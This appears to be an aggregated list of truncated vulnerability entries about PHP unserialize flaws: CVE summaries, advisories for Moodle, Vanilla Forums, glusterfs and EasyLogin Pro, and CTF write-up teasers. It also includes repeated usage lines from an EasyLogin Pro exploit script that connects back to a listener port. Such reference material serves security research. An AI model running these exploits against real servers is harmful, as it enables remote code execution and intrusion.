CVE-2018-19396

ext/standard/varunserializer.c in PHP 5.x through 7.1.24 allows attackers to cause a denial of service application crash via an unserialize call for the com, dotnet, or variant class...

CVE-2018-19396

CVE-2018-19396 affects PHP 5.x through 7.1.24. The issue lies in ext/standard/var_unserializer.c where an unserialize call for the com, dotnet, or variant class can cause a denial of service (application crash). Several connected advisories (EulerOS/OpenVAS/NVD entries) document this vulnerabilit...

CVE-2018-19396

Removed by vendor...

h1-5411-CTF: Solution for h15411's CTF challenge

Baby steps Earlier today a friend tipped me off about an ongoing CTF challenge that was being run by HackerOne and would get the first ten winners a ticket to participate in h15411, which will be a live-hacking event happening in Buenos Aires. This immediately caught my attention and I decided to...

h1-5411-CTF: H1-5411 CTF Write-up by erbbysam and ziot

@erbbysam and I recently set out to beat the latest CTF challenge hosted by HackerOne. Here is a write-up with the process we took from start to finish. The h1-5411 CTF begins with a tweet from HackerOne: https://twitter.com/Hacker0x01/status/1044974142150373378 F351665 This leads to a website...

Moodle 3.x PHP Unserialize Remote Code Execution

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Remote Code Execution via PHP unserialize product: Moodle - Open-source learning platform vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier...

Vanilla: Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability

Summary: An authenticated admin user can inject an unserializable password in a another users account. Later when attempting a login with that user, the attacker can trigger a call to an unserialize in the splitHash function. By using a custom pop chain to write into the constants.php file, an...

Vanilla: Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability

Summary: An authenticated admin user can trigger a call to unserialize which can allow an attacker to gain remote code execution. Description: Please bare with me on this one, it's heavy. Ok, so after setting a Garden.TouchIcon setting it can be several settings, this is just an example of one we...

glusterfs: Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory

A flaw was found in dict.c:dictunserialize function of glusterfs, dicunserialize function does not handle negative key length values. An attacker could use this flaw to read memory from other locations into the stored dict value...

glusterfs: Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory

A flaw was found in dict.c:dictunserialize function of glusterfs, dicunserialize function does not handle negative key length values. An attacker could use this flaw to read memory from other locations into the stored dict value...

CVE-2018-15576

An issue was discovered in EasyLogin Pro through 1.3.0. Encryptor.php contains an unserialize call that can be exploited for remote code execution in the decrypt function, if the attacker knows the key...

Remote code execution

An issue was discovered in EasyLogin Pro through 1.3.0. Encryptor.php contains an unserialize call that can be exploited for remote code execution in the decrypt function, if the attacker knows the key...

CVE-2018-15576

CVE-2018-15576 affects EasyLogin Pro up to version 1.3.0. The vulnerability is in Encryptor.php, where an unserialize call in the decrypt function can lead to remote code execution if an attacker knows the key. Documents indicate public exploitation evidence (Exploit-DB, etc.), confirming a RCE r...

CVE-2018-15576

An issue was discovered in EasyLogin Pro through 1.3.0. Encryptor.php contains an unserialize call that can be exploited for remote code execution in the decrypt function, if the attacker knows the key...

Easylogin Pro 1.3.0 Remote Code Execution

!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

Easylogin Pro 1.3.0 - Unserialize Remote Code Execution Exploit

Exploit for php platform in category remote exploits !/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- email protected:$ ./e.php -t...

Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution

!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

New PHP Code Execution Attack Puts WordPress Sites at Risk

Sam Thomas, a security researcher from Secarma, has discovered a new exploitation technique that could make it easier for hackers to trigger critical deserialization vulnerabilities in PHP programming language using previously low-risk considered functions. The new technique leaves hundreds of...

SRC-2018-0030 : Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability

Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Vanilla Forums. Authentication is not required to exploit this vulnerability. The specific flaw exists within the domGetImages function of the ImportController class. The iss...

SRC-2018-0033 : Vanilla Forums XenforoPassword splitHash unserialize Remote Code Execution Vulnerability

Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Vanilla Forums. Authentication is required to exploit this vulnerability, however the authentication can be bypassed. The specific flaw exists within the splitHash function o...